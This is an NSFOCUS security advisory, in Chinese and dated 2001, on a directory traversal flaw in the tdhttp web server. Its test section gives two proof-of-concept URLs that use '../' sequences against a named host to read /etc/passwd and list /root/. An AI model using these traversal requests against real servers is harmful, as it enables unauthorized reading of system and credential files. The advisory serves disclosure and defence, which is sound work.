NSFOCUS绿盟科技

首页 -> 安全研究

安全研究

安全漏洞

tdhttp目录遍历漏洞

发布日期：2001-02-14
更新日期：2001-02-14

受影响系统：

tdhttp

描述：

tdhttp的http.c存在设计上的疏忽，允许利用"../"的古老技术进行服务端目录遍历。

<* 来源：UkR-XblP (cuctema@ok.ru) *>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://www.timduff.com/../../../../../../../../../../etc/passwd
http://www.timduff.com/../../../../../../../../../../root/

建议：

临时解决方法：

NSFOCUS建议您暂时换用其他的web server,例如apache

厂商补丁：

暂无

浏览次数：3645
严重程度：0（网友投票）

本安全漏洞由绿盟科技翻译整理，版权所有，未经许可，不得转载
绿盟科技给您安全的保障

关于我们: 公司介绍; 公司荣誉; 公司新闻

联系我们: 公司总部; 分支机构; 海外机构

快速链接: 绿盟云; 绿盟威胁情报中心NTI; 技术博客